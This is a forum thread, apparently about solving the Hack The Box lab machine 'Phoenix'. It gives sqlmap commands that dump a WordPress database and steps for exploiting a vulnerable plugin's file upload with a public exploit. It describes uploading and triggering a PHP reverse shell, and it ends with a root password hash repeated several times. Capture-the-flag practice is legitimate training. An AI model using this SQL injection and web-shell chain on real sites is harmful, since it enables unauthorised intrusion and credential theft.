(April 19, 2022, 05:14 AM) koil Wrote:
(April 19, 2022, 04:41 AM) ___user___ Wrote:
sqlmap -u https://phoenix.htb/forum/?subscribe_topic=1 --dbs
It will take a long time.
You need to dump plugins in database.
Any way to dump creds?
Enumerate all the plugins in the WordPress db.
sqlmap -u https://phoenix.htb/forum/?subscribe_topic=1 -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump --batch
download from file plugin is vulnerable
https://www.exploit-db.com/exploits/50287
SSL cert issue. Add verify=False in request.get and request.post in the Python script.
pentestmonkey php revshell
change php to phtml.
python3 50287.py https://phoenix.htb zz.phtml -- upload the shell
https://phoenix.htb/wp-admin/zz.phtml -- trigger the shell
sql cred in the wp-config file.
https://fdlucifer.github.io/2022/03/24/phoenix/
$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0
https://threatninja.net/hack-the-box-phoenix-machine-walkthrough-hard-difficulty/
$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0
https://synisl33t.com/2022/03/08/htb-phoenix/
root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::